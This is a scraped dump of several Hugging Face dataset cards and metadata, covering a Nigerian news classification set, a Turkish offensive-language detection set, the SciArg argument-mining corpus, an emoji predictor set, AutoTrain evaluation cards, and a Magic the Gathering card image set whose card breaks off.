] | 2022-07-28T08:10:22+00:00 | {"annotations_creators": ["other"], "language_creators": ["found"], "language": ["en"], "license": ["afl-3.0"], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["text-classification"], "task_ids": ["topic-classification", "multi-class-classification"], "pretty_name": "News Dataset", "tags": []} | 2022-08-25T09:36:01+00:00 | [] | [
"en"
] | TAGS
#task_categories-text-classification #task_ids-topic-classification #task_ids-multi-class-classification #annotations_creators-other #language_creators-found #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-original #language-English #license-afl-3.0 #region-us
| Dataset Card for news-data
==========================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Dataset Curators
### Dataset Summary
The News Dataset is an English-language dataset containing just over 4k unique news articles scrapped from AriseTv- One of the most popular news television in Nigeria.
### Supported Tasks and Leaderboards
It supports news article classification into different categories.
### Languages
English
Dataset Structure
-----------------
### Data Instances
'''
{'Title': 'Nigeria: APC Yet to Zone Party Positions Ahead of Convention'
'Excerpt': 'The leadership of the All Progressives Congress (APC), has denied reports that it had zoned some party positions ahead of'
'Category': 'politics'
'labels': 2}
'''
### Data Fields
* Title: a string containing the title of a news title as shown
* Excerpt: a string containing a short extract from the body of the news
* Category: a string that tells the category of an example (string label)
* labels: integer telling the class of an example (label)
### Data Splits
Dataset Creation
----------------
### Source Data
#### Initial Data Collection and Normalization
The code for the dataset creation at \*URL The examples were scrapped from
<URL
### Annotations
#### Annotation process
The annotation is based on the news category in the arisetv website
#### Who are the annotators?
Journalists at arisetv
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
The purpose of this dataset is to help develop models that can classify news articles into categories.
This task is useful for efficiently presenting information given a large quantity of text. It should be made clear that any summarizations produced by models trained on this dataset are reflective of the language used in the articles, but are in fact automatically generated.
### Discussion of Biases
This data is biased towards news happenings in Nigeria but the model built using it can as well classify news from other parts of the world
with a slight degradation in performance.
### Dataset Curators
The dataset is created by people at arise but was scrapped by @github-chimaobi-okite
| [
"### Dataset Summary\n\n\nThe News Dataset is an English-language dataset containing just over 4k unique news articles scrapped from AriseTv- One of the most popular news television in Nigeria.",
"### Supported Tasks and Leaderboards\n\n\nIt supports news article classification into different categories.",
"### Languages\n\n\nEnglish\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\n'''\n{'Title': 'Nigeria: APC Yet to Zone Party Positions Ahead of Convention'\n'Excerpt': 'The leadership of the All Progressives Congress (APC), has denied reports that it had zoned some party positions ahead of'\n'Category': 'politics'\n'labels': 2}\n'''",
"### Data Fields\n\n\n* Title: a string containing the title of a news title as shown\n* Excerpt: a string containing a short extract from the body of the news\n* Category: a string that tells the category of an example (string label)\n* labels: integer telling the class of an example (label)",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe code for the dataset creation at \\*URL The examples were scrapped from\n<URL",
"### Annotations",
"#### Annotation process\n\n\nThe annotation is based on the news category in the arisetv website",
"#### Who are the annotators?\n\n\nJournalists at arisetv\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nThe purpose of this dataset is to help develop models that can classify news articles into categories.\n\n\nThis task is useful for efficiently presenting information given a large quantity of text. It should be made clear that any summarizations produced by models trained on this dataset are reflective of the language used in the articles, but are in fact automatically generated.",
"### Discussion of Biases\n\n\nThis data is biased towards news happenings in Nigeria but the model built using it can as well classify news from other parts of the world\nwith a slight degradation in performance.",
"### Dataset Curators\n\n\nThe dataset is created by people at arise but was scrapped by @github-chimaobi-okite"
] | [
"TAGS\n#task_categories-text-classification #task_ids-topic-classification #task_ids-multi-class-classification #annotations_creators-other #language_creators-found #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-original #language-English #license-afl-3.0 #region-us \n",
"### Dataset Summary\n\n\nThe News Dataset is an English-language dataset containing just over 4k unique news articles scrapped from AriseTv- One of the most popular news television in Nigeria.",
"### Supported Tasks and Leaderboards\n\n\nIt supports news article classification into different categories.",
"### Languages\n\n\nEnglish\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\n'''\n{'Title': 'Nigeria: APC Yet to Zone Party Positions Ahead of Convention'\n'Excerpt': 'The leadership of the All Progressives Congress (APC), has denied reports that it had zoned some party positions ahead of'\n'Category': 'politics'\n'labels': 2}\n'''",
"### Data Fields\n\n\n* Title: a string containing the title of a news title as shown\n* Excerpt: a string containing a short extract from the body of the news\n* Category: a string that tells the category of an example (string label)\n* labels: integer telling the class of an example (label)",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe code for the dataset creation at \\*URL The examples were scrapped from\n<URL",
"### Annotations",
"#### Annotation process\n\n\nThe annotation is based on the news category in the arisetv website",
"#### Who are the annotators?\n\n\nJournalists at arisetv\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nThe purpose of this dataset is to help develop models that can classify news articles into categories.\n\n\nThis task is useful for efficiently presenting information given a large quantity of text. It should be made clear that any summarizations produced by models trained on this dataset are reflective of the language used in the articles, but are in fact automatically generated.",
"### Discussion of Biases\n\n\nThis data is biased towards news happenings in Nigeria but the model built using it can as well classify news from other parts of the world\nwith a slight degradation in performance.",
"### Dataset Curators\n\n\nThe dataset is created by people at arise but was scrapped by @github-chimaobi-okite"
] |
5aff92f9c824061b0781a5ff1bbf1e8246de5840 |
# Dataset Summary
This dataset is enhanced version of existing offensive language studies. Existing studies are highly imbalanced, and solving this problem is too costly. To solve this, we proposed contextual data mining method for dataset augmentation. Our method is basically prevent us from retrieving random tweets and label individually. We can directly access almost exact hate related tweets and label them directly without any further human interaction in order to solve imbalanced label problem.
In addition, existing studies *(can be found at Reference section)* are merged to create even more comprehensive and robust dataset for Turkish offensive language detection task.
The file train.csv contains 42,398, test.csv contains 8,851, valid.csv contains 1,756 annotated tweets.
# Dataset Structure
A binary dataset with with (0) Not Offensive and (1) Offensive tweets.
### Task and Labels
Offensive language identification:
- (0) Not Offensive - Tweet does not contain offense or profanity.
- (1) Offensive - Tweet contains offensive language or a targeted (veiled or direct) offense
### Data Splits
| | train | test | dev |
|------:|:------|:-----|:-----|
| 0 (Not Offensive) | 22,589 | 4,436 | 1,402 |
| 1 (Offensive) | 19,809 | 4,415 | 354 |
### Citation Information
```
T. Tanyel, B. Alkurdi and S. Ayvaz, "Linguistic-based Data Augmentation Approach for Offensive Language Detection," 2022 7th International Conference on Computer Science and Engineering (UBMK), 2022, pp. 1-6, doi: 10.1109/UBMK55850.2022.9919562.
```
### Paper codes
https://github.com/tanyelai/lingda
# References
We merged open-source offensive language dataset studies in Turkish to increase contextuality with existing data even more, before our method is applied.
- https://huggingface.co/datasets/offenseval2020_tr
- https://github.com/imayda/turkish-hate-speech-dataset-2
- https://www.kaggle.com/datasets/kbulutozler/5k-turkish-tweets-with-incivil-content
| Toygar/turkish-offensive-language-detection | [
"task_categories:text-classification",
"annotations_creators:crowdsourced",
"annotations_creators:expert-generated",
"language_creators:crowdsourced",
"multilinguality:monolingual",
"size_categories:10K<n<100K",
"language:tr",
"license:cc-by-2.0",
"offensive-language-classification",
"region:us"
] | 2022-07-28T10:45:25+00:00 | {"annotations_creators": ["crowdsourced", "expert-generated"], "language_creators": ["crowdsourced"], "language": ["tr"], "license": ["cc-by-2.0"], "multilinguality": ["monolingual"], "size_categories": ["10K<n<100K"], "source_datasets": [], "task_categories": ["text-classification"], "task_ids": [], "pretty_name": "Turkish Offensive Language Detection Dataset", "tags": ["offensive-language-classification"]} | 2023-10-31T21:57:24+00:00 | [] | [
"tr"
] | TAGS
#task_categories-text-classification #annotations_creators-crowdsourced #annotations_creators-expert-generated #language_creators-crowdsourced #multilinguality-monolingual #size_categories-10K<n<100K #language-Turkish #license-cc-by-2.0 #offensive-language-classification #region-us
| Dataset Summary
===============
This dataset is enhanced version of existing offensive language studies. Existing studies are highly imbalanced, and solving this problem is too costly. To solve this, we proposed contextual data mining method for dataset augmentation. Our method is basically prevent us from retrieving random tweets and label individually. We can directly access almost exact hate related tweets and label them directly without any further human interaction in order to solve imbalanced label problem.
In addition, existing studies *(can be found at Reference section)* are merged to create even more comprehensive and robust dataset for Turkish offensive language detection task.
The file URL contains 42,398, URL contains 8,851, URL contains 1,756 annotated tweets.
Dataset Structure
=================
A binary dataset with with (0) Not Offensive and (1) Offensive tweets.
### Task and Labels
Offensive language identification:
* (0) Not Offensive - Tweet does not contain offense or profanity.
* (1) Offensive - Tweet contains offensive language or a targeted (veiled or direct) offense
### Data Splits
### Paper codes
URL
References
==========
We merged open-source offensive language dataset studies in Turkish to increase contextuality with existing data even more, before our method is applied.
* URL
* URL
* URL
| [
"### Task and Labels\n\n\nOffensive language identification:\n\n\n* (0) Not Offensive - Tweet does not contain offense or profanity.\n* (1) Offensive - Tweet contains offensive language or a targeted (veiled or direct) offense",
"### Data Splits",
"### Paper codes\n\n\nURL\n\n\nReferences\n==========\n\n\nWe merged open-source offensive language dataset studies in Turkish to increase contextuality with existing data even more, before our method is applied.\n\n\n* URL\n* URL\n* URL"
] | [
"TAGS\n#task_categories-text-classification #annotations_creators-crowdsourced #annotations_creators-expert-generated #language_creators-crowdsourced #multilinguality-monolingual #size_categories-10K<n<100K #language-Turkish #license-cc-by-2.0 #offensive-language-classification #region-us \n",
"### Task and Labels\n\n\nOffensive language identification:\n\n\n* (0) Not Offensive - Tweet does not contain offense or profanity.\n* (1) Offensive - Tweet contains offensive language or a targeted (veiled or direct) offense",
"### Data Splits",
"### Paper codes\n\n\nURL\n\n\nReferences\n==========\n\n\nWe merged open-source offensive language dataset studies in Turkish to increase contextuality with existing data even more, before our method is applied.\n\n\n* URL\n* URL\n* URL"
] |
15ba2479192e7cf974e4e295a7d721a650c06f03 |
# Dataset Card for "sciarg"
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [https://github.com/anlausch/ArguminSci](https://github.com/anlausch/ArguminSci)
- **Repository:** [https://github.com/anlausch/ArguminSci](https://github.com/anlausch/ArguminSci)
- **Paper:** [An argument-annotated corpus of scientific publications](https://aclanthology.org/W18-5206.pdf)
- **Leaderboard:** [More Information Needed](https://github.com/huggingface/datasets/blob/master/CONTRIBUTING.md#how-to-contribute-to-the-dataset-cards)
- **Point of Contact:** [More Information Needed](https://github.com/huggingface/datasets/blob/master/CONTRIBUTING.md#how-to-contribute-to-the-dataset-cards)
### Dataset Summary
The SciArg dataset is an extension of the Dr. Inventor corpus (Fisas et al., 2015, 2016) with an annotation layer containing
fine-grained argumentative components and relations. It is the first argument-annotated corpus of scientific
publications (in English), which allows for joint analyses of argumentation and other rhetorical dimensions of
scientific writing.
### Supported Tasks and Leaderboards
[More Information Needed](https://github.com/huggingface/datasets/blob/master/CONTRIBUTING.md#how-to-contribute-to-the-dataset-cards)
### Languages
The language in the dataset is English.
## Dataset Structure
### Data Instances
[More Information Needed]
### Data Fields
- `document_id`: the base file name, e.g. "A28"
- `text`: the parsed text of the scientific publication in the XML format
- `text_bound_annotations`: span annotations that mark argumentative discourse units (ADUs). Each entry has the following fields: `offsets`, `text`, `type`, and `id`.
- `relations`: binary relation annotations that mark the argumentative relations that hold between a head and a tail ADU. Each entry has the following fields: `id`, `head`, `tail`, and `type` where `head` and `tail` each have the fields: `ref_id` and `role`.
### Data Splits
The dataset consists of a single `train` split that has 40 documents.
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
```
@inproceedings{lauscher2018b,
title = {An argument-annotated corpus of scientific publications},
booktitle = {Proceedings of the 5th Workshop on Mining Argumentation},
publisher = {Association for Computational Linguistics},
author = {Lauscher, Anne and Glava\v{s}, Goran and Ponzetto, Simone Paolo},
address = {Brussels, Belgium},
year = {2018},
pages = {40–46}
}
```
### Contributions
Thanks to [@github-username](https://github.com/<github-username>) for adding this dataset.
| DFKI-SLT/sciarg | [
"task_categories:token-classification",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"source_datasets:dr inventor corpus",
"language:en",
"argument mining",
"scientific text",
"relation extraction",
"argumentative discourse unit recognition",
"region:us"
] | 2022-07-28T12:55:00+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["en"], "license": [], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["dr inventor corpus"], "task_categories": ["token-classification"], "task_ids": [], "pretty_name": "SciArg", "tags": ["argument mining", "scientific text", "relation extraction", "argumentative discourse unit recognition"]} | 2022-07-28T13:04:31+00:00 | [] | [
"en"
] | TAGS
#task_categories-token-classification #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-dr inventor corpus #language-English #argument mining #scientific text #relation extraction #argumentative discourse unit recognition #region-us
|
# Dataset Card for "sciarg"
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage: URL
- Repository: URL
- Paper: An argument-annotated corpus of scientific publications
- Leaderboard:
- Point of Contact:
### Dataset Summary
The SciArg dataset is an extension of the Dr. Inventor corpus (Fisas et al., 2015, 2016) with an annotation layer containing
fine-grained argumentative components and relations. It is the first argument-annotated corpus of scientific
publications (in English), which allows for joint analyses of argumentation and other rhetorical dimensions of
scientific writing.
### Supported Tasks and Leaderboards
### Languages
The language in the dataset is English.
## Dataset Structure
### Data Instances
### Data Fields
- 'document_id': the base file name, e.g. "A28"
- 'text': the parsed text of the scientific publication in the XML format
- 'text_bound_annotations': span annotations that mark argumentative discourse units (ADUs). Each entry has the following fields: 'offsets', 'text', 'type', and 'id'.
- 'relations': binary relation annotations that mark the argumentative relations that hold between a head and a tail ADU. Each entry has the following fields: 'id', 'head', 'tail', and 'type' where 'head' and 'tail' each have the fields: 'ref_id' and 'role'.
### Data Splits
The dataset consists of a single 'train' split that has 40 documents.
## Dataset Creation
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
## Considerations for Using the Data
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
## Additional Information
### Dataset Curators
### Licensing Information
### Contributions
Thanks to @github-username for adding this dataset.
| [
"# Dataset Card for \"sciarg\"",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: URL\n- Repository: URL\n- Paper: An argument-annotated corpus of scientific publications\n- Leaderboard: \n- Point of Contact:",
"### Dataset Summary\n\nThe SciArg dataset is an extension of the Dr. Inventor corpus (Fisas et al., 2015, 2016) with an annotation layer containing \nfine-grained argumentative components and relations. It is the first argument-annotated corpus of scientific \npublications (in English), which allows for joint analyses of argumentation and other rhetorical dimensions of \nscientific writing.",
"### Supported Tasks and Leaderboards",
"### Languages\n\nThe language in the dataset is English.",
"## Dataset Structure",
"### Data Instances",
"### Data Fields\n\n- 'document_id': the base file name, e.g. \"A28\"\n- 'text': the parsed text of the scientific publication in the XML format\n- 'text_bound_annotations': span annotations that mark argumentative discourse units (ADUs). Each entry has the following fields: 'offsets', 'text', 'type', and 'id'.\n- 'relations': binary relation annotations that mark the argumentative relations that hold between a head and a tail ADU. Each entry has the following fields: 'id', 'head', 'tail', and 'type' where 'head' and 'tail' each have the fields: 'ref_id' and 'role'.",
"### Data Splits\n\nThe dataset consists of a single 'train' split that has 40 documents.",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @github-username for adding this dataset."
] | [
"TAGS\n#task_categories-token-classification #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-dr inventor corpus #language-English #argument mining #scientific text #relation extraction #argumentative discourse unit recognition #region-us \n",
"# Dataset Card for \"sciarg\"",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: URL\n- Repository: URL\n- Paper: An argument-annotated corpus of scientific publications\n- Leaderboard: \n- Point of Contact:",
"### Dataset Summary\n\nThe SciArg dataset is an extension of the Dr. Inventor corpus (Fisas et al., 2015, 2016) with an annotation layer containing \nfine-grained argumentative components and relations. It is the first argument-annotated corpus of scientific \npublications (in English), which allows for joint analyses of argumentation and other rhetorical dimensions of \nscientific writing.",
"### Supported Tasks and Leaderboards",
"### Languages\n\nThe language in the dataset is English.",
"## Dataset Structure",
"### Data Instances",
"### Data Fields\n\n- 'document_id': the base file name, e.g. \"A28\"\n- 'text': the parsed text of the scientific publication in the XML format\n- 'text_bound_annotations': span annotations that mark argumentative discourse units (ADUs). Each entry has the following fields: 'offsets', 'text', 'type', and 'id'.\n- 'relations': binary relation annotations that mark the argumentative relations that hold between a head and a tail ADU. Each entry has the following fields: 'id', 'head', 'tail', and 'type' where 'head' and 'tail' each have the fields: 'ref_id' and 'role'.",
"### Data Splits\n\nThe dataset consists of a single 'train' split that has 40 documents.",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @github-username for adding this dataset."
] |
0af1841a59d37a07091ea69bce12947558fa4d55 | # Emoji Predictor
Dataset consists of raw tweets as text and an emoji as the label.
original dataset: https://huggingface.co/datasets/AlekseyDorkin/extended_tweet_emojis
- Fine-tuned model: https://huggingface.co/vincentclaes/emoji-predictor
- Try the model here: https://huggingface.co/spaces/vincentclaes/emoji-predictor | vincentclaes/emoji-predictor | [
"region:us"
] | 2022-07-28T13:05:10+00:00 | {} | 2022-09-20T13:38:38+00:00 | [] | [] | TAGS
#region-us
| # Emoji Predictor
Dataset consists of raw tweets as text and an emoji as the label.
original dataset: URL
- Fine-tuned model: URL
- Try the model here: URL | [
"# Emoji Predictor\n\nDataset consists of raw tweets as text and an emoji as the label.\noriginal dataset: URL\n\n- Fine-tuned model: URL\n- Try the model here: URL"
] | [
"TAGS\n#region-us \n",
"# Emoji Predictor\n\nDataset consists of raw tweets as text and an emoji as the label.\noriginal dataset: URL\n\n- Fine-tuned model: URL\n- Try the model here: URL"
] |
e81ff8291dc22db23b272e9a5c393d322e530891 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: Blaise-g/led_finetuned_sumpubmed
* Dataset: Blaise-g/SumPubmed
* Config: Blaise-g--SumPubmed
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@Blaise-g](https://huggingface.co/Blaise-g) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-Blaise-g__SumPubmed-ce219d86-12025605 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-28T18:53:37+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["Blaise-g/SumPubmed"], "eval_info": {"task": "summarization", "model": "Blaise-g/led_finetuned_sumpubmed", "metrics": ["bertscore"], "dataset_name": "Blaise-g/SumPubmed", "dataset_config": "Blaise-g--SumPubmed", "dataset_split": "test", "col_mapping": {"text": "text", "target": "abstract"}}} | 2022-07-28T20:06:06+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: Blaise-g/led_finetuned_sumpubmed
* Dataset: Blaise-g/SumPubmed
* Config: Blaise-g--SumPubmed
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @Blaise-g for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: Blaise-g/led_finetuned_sumpubmed\n* Dataset: Blaise-g/SumPubmed\n* Config: Blaise-g--SumPubmed\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @Blaise-g for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: Blaise-g/led_finetuned_sumpubmed\n* Dataset: Blaise-g/SumPubmed\n* Config: Blaise-g--SumPubmed\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @Blaise-g for evaluating this model."
] |
49bca9d76447b7dbe452b2a8a4426155c28df4ba | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: nbroad/longt5-base-global-mediasum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-ca1f103f-12035606 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-28T18:57:31+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "nbroad/longt5-base-global-mediasum", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-28T19:34:23+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: nbroad/longt5-base-global-mediasum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: nbroad/longt5-base-global-mediasum\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: nbroad/longt5-base-global-mediasum\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
7b01ec427ea3d0e879e4e26ca3cdfa5ce6526ca9 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: nbroad/longt5-base-global-mediasum
* Dataset: xsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-xsum-20a28003-12045607 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-28T19:00:01+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["xsum"], "eval_info": {"task": "summarization", "model": "nbroad/longt5-base-global-mediasum", "metrics": [], "dataset_name": "xsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "document", "target": "summary"}}} | 2022-07-28T19:27:48+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: nbroad/longt5-base-global-mediasum
* Dataset: xsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @nbroad for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: nbroad/longt5-base-global-mediasum\n* Dataset: xsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: nbroad/longt5-base-global-mediasum\n* Dataset: xsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @nbroad for evaluating this model."
] |
399ed23149edf1be91a18fd8e60e3fea25262dfc |
## Dataset Description
- **Homepage:** the [Gatherer](https://gatherer.wizards.com/Pages/)
- **Repository:** https://github.com/alcazar90/croupier-mtg-dataset
### Dataset Summary
A card images dataset of 4 types of creatures from Magic the Gathering card game: elf, goblin, knight, and zombie.
## Dataset Creation
All card information from Magic the Gathering card game is public available from the
[Gatherer]( https://gatherer.wizards.com/Pages/) website, the official Magic Card Database. The dataset is just
a subset selection of 4 kind of creatures from the game. | alkzar90/croupier-mtg-dataset | [
"task_categories:image-classification",
"task_ids:multi-class-image-classification",
"annotations_creators:found",
"size_categories:1K<n<10K",
"source_datasets:original",
"license:apache-2.0",
"mgt",
"magic-card-game",
"creature-dataset",
"region:us"
] | 2022-07-28T20:18:49+00:00 | {"annotations_creators": ["found"], "language_creators": [], "language": [], "license": ["apache-2.0"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["image-classification"], "task_ids": ["multi-class-image-classification"], "pretty_name": "Croupier: a Magic the Gathering creatures dataset", "tags": ["mgt", "magic-card-game", "creature-dataset"]} | 2022-08-02T00:41:48+00:00 | [] | [] | TAGS
#task_categories-image-classification #task_ids-multi-class-image-classification #annotations_creators-found #size_categories-1K<n<10K #source_datasets-original #license-apache-2.0 #mgt #magic-card-game #creature-dataset #region-us
|
## Dataset Description
- Homepage: the Gatherer
- Repository: URL
### Dataset Summary
